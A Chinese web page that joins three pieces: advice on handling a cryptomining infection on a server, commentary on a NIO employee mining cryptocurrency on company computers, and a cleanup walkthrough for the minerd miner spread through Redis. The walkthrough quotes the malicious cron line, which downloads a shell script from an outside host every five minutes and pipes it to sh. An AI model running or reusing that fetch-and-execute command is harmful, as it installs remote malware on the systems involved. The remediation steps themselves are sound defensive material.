遇到以上问题,需要先找服务器商对其说明实际情况,配合他们排查,基本上就是中了挖矿病毒。
最简单的方法就是重装系统,但是系统盘数据都会清空,这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统,需要把自己的文件扫毒一遍确认安全后再导入服务器。
但是服务器里如果有很多重要的文件还有比较难配置的环境,那就需要排查删除挖矿程序,全盘扫毒,删除可疑文件,一个个修复病毒对系统的修改。
防范建议:
1.尽量不要使用默认密码和端口,改一个比较复杂的密码
2.可以使用宝塔面板登陆服务器
3.系统自带的防火墙、安全防护都不要关闭
蔚来汽车为何又被曝出不良事件?员工被曝光出利用公司的电脑挖矿,这会对公司产生不良的影响。
随着科技的不断发展,燃油车已经慢慢的退出了现实生活已经有多家知名汽车品牌决定停止燃油车的生产,其中就有大家非常熟悉的比亚迪,而我们国内几个非常出众的新能源品牌也开始在慢慢的崛起,比如蔚来汽车。然而没想到根据相关媒体的报道,一篇来自于蔚来汽车公司内部的通报信息获得了大家的关注,在这份通报当中我们可以看出,蔚来的员工利用公司的电脑进行虚拟货币的挖掘工作并且从中获利。
毫无疑问这件事情已经给蔚来汽车公司带来了不好的影响,因为在通报当中我们可以看出这件事情公司并没有打算对外界宣布,而是在公司内部通报批评达到一个警示的作用,在通报当中发现这名员工在足足备着公司挖了一年的矿,才被发现这种监管漏洞属实是不应该。虽然他们一直都在强调自己是一个年轻的公司,并且在逐步和国际接轨,可是所曝光出来的问题却是非常的低级。
只不过这则消息是相关的媒体曝光出来,但是官方并没有给予出任何的回应,相信对于这种企业的污点事件,他们肯定不愿意被观众所熟知,但是被曝光之后自然而然要想出一个好的公关举措,毕竟如果给消费者们带来了不良的影响,很有可能导致大家不愿意去信任这样一个正在冉冉升起的新能源汽车品牌,毕竟连手下的员工都能够背着公司做出如此荒唐的事件,很难想象,这家公司是否会被着消费者做出一些更加出格的动作,甚至是窃取个人的身份信息等等。
既然此件事情已经报告出来,蔚来公司一定会寄出一个合理的答复。我们也希望这个回复可以越快越好,毕竟作为一个国内知名的新能源汽车品牌,他们已经在公众的心目当中有了一个公信度,在如此关键的成长阶段出现这么不好的负面新闻,稍微处理不善就有可能将其品牌的公信度大大减少,并且影响到今后的新品汽车发售以及销售问题。也希望官方能够注意到这件事情的严重性,从公司的内部进行一次彻彻底底的大审查,争取杜绝今后再在企业内部发生这样的事情。
1. 关闭访问挖矿服务器的访问iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
欢迎分享,转载请注明来源:夏雨云
微信扫一扫
支付宝扫一扫
评论列表(0条)